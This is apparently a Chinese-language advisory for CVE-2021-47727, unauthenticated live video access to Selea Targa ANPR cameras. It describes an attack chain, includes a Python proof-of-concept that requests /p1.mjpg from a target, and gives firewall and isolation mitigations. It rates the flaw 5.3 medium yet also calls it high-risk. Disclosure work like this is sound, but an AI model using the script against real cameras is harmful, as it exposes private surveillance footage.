CVE-2021-47727 Selea Targa IP摄像机未授权视频流访问漏洞

漏洞信息

漏洞编号

CVE-2021-47727

漏洞类型

未授权访问

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Selea Targa IP OCR-ANPR Camera

漏洞概述

CVE-2021-47727是影响Selea Targa IP OCR-ANPR摄像机的一个高危安全漏洞。该漏洞允许远程攻击者无需任何认证即可访问摄像机的实时视频流。Selea是一家专注于ANPR（自动车牌识别）系统的意大利公司，其Targa系列产品广泛应用于交通监控、停车场管理和安全监控等场景。由于该摄像机存在认证机制缺陷，攻击者可以通过构造特定的HTTP请求直接访问视频流端点（如p1.mjpg或p1.264），无需提供任何用户名或密码即可查看实时监控画面。此漏洞影响摄像机的机密性，可能导致敏感场所的监控画面被非法获取，对使用该设备的组织造成严重的安全风险。攻击者可以利用此漏洞进行间谍活动、收集情报或进一步实施更复杂的攻击。由于该设备通常部署在关键基础设施和敏感场所，未经授权的视频访问可能导致严重的隐私泄露和安全威胁。

技术细节

该漏洞存在于Selea Targa IP OCR-ANPR摄像机的Web服务器组件中。摄像机的视频流服务（RTP/RTSP和M-JPEG）缺少适当的身份验证机制。攻击者可以通过以下端点直接访问视频流：p1.mjpg（M-JPEG格式）和p1.264（H.264格式）。攻击者只需构造标准的HTTP GET请求到这些端点，服务器便会返回视频流数据，无需任何会话令牌或认证cookie。漏洞的根本原因在于摄像机的固件设计缺陷，开发者可能出于简化部署的考虑省略了认证步骤，但这导致了严重的安全隐患。攻击者通常会使用VLC媒体播放器或专门开发的工具来连接这些视频流。此外，攻击者还可能通过自动化工具批量扫描互联网上的易受攻击设备。一旦连接成功，攻击者可以长时间监控目标场所的活动，录制视频片段用于后续分析或恶意用途。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者通过Shodan、Censys等搜索引擎扫描互联网上的Selea Targa摄像机，或者针对特定IP范围进行扫描探测

STEP 2

步骤2: 目标识别

识别目标摄像机的Web管理界面和视频流服务端口，通常为80或8080端口

STEP 3

步骤3: 构造恶意请求

攻击者构造HTTP GET请求，访问/p1.mjpg或/p1.264等视频流端点，无需任何认证信息

STEP 4

步骤4: 视频流劫持

服务器响应并返回视频流数据，攻击者使用VLC等播放器或自定义程序接收并显示视频内容

STEP 5

步骤5: 持续监控

攻击者可以持续连接视频流，录制监控画面用于后续分析、敲诈或情报收集

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2021-47727 PoC - Selea Targa IP Camera Unauthenticated Video Stream Access
# Usage: python cve-2021-47727.py <target_ip> <port>

import socket
import sys

def exploit(target_ip, port=80):
    """Exploit CVE-2021-47727 to access video stream without authentication"""
    
    # HTTP GET request for M-JPEG stream
    mjpg_request = f"GET /p1.mjpg HTTP/1.1\r\n"
    mjpg_request += f"Host: {target_ip}:{port}\r\n"
    mjpg_request += "User-Agent: Mozilla/5.0\r\n"
    mjpg_request += "Accept: */*\r\n"
    mjpg_request += "Connection: keep-alive\r\n\r\n"
    
    # Alternative: HTTP GET request for H.264 stream
    h264_request = f"GET /p1.264 HTTP/1.1\r\n"
    h264_request += f"Host: {target_ip}:{port}\r\n"
    h264_request += "User-Agent: Mozilla/5.0\r\n"
    h264_request += "Accept: */*\r\n"
    h264_request += "Connection: keep-alive\r\n\r\n"
    
    print(f"[*] Targeting Selea Targa Camera at {target_ip}:{port}")
    print("[*] Attempting to access M-JPEG stream...")
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, port))
        sock.send(mjpg_request.encode())
        
        response = sock.recv(4096)
        if b"HTTP/1.1 200" in response or b"Content-Type:" in response:
            print("[+] SUCCESS: Video stream accessible without authentication!")
            print(f"[+] Response preview: {response[:200]}")
            return True
        else:
            print("[-] Failed to access stream")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    finally:
        sock.close()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

影响范围

Selea Targa IP OCR-ANPR Camera (固件版本未知)

所有未修补固件版本均受影响

防御指南

临时缓解措施

在厂商提供修复补丁之前，建议采取以下临时缓解措施：1) 使用网络防火墙或ACL限制对摄像机Web界面和视频流端口的访问，只允许受信任的IP地址连接；2) 将摄像机部署在独立的网络隔离区域，与关键业务系统物理隔离；3) 监控网络流量，及时发现异常的持续连接行为；4) 考虑暂时替换为其他品牌的摄像机产品；5) 禁止将摄像机直接暴露在互联网上，使用VPN进行远程访问。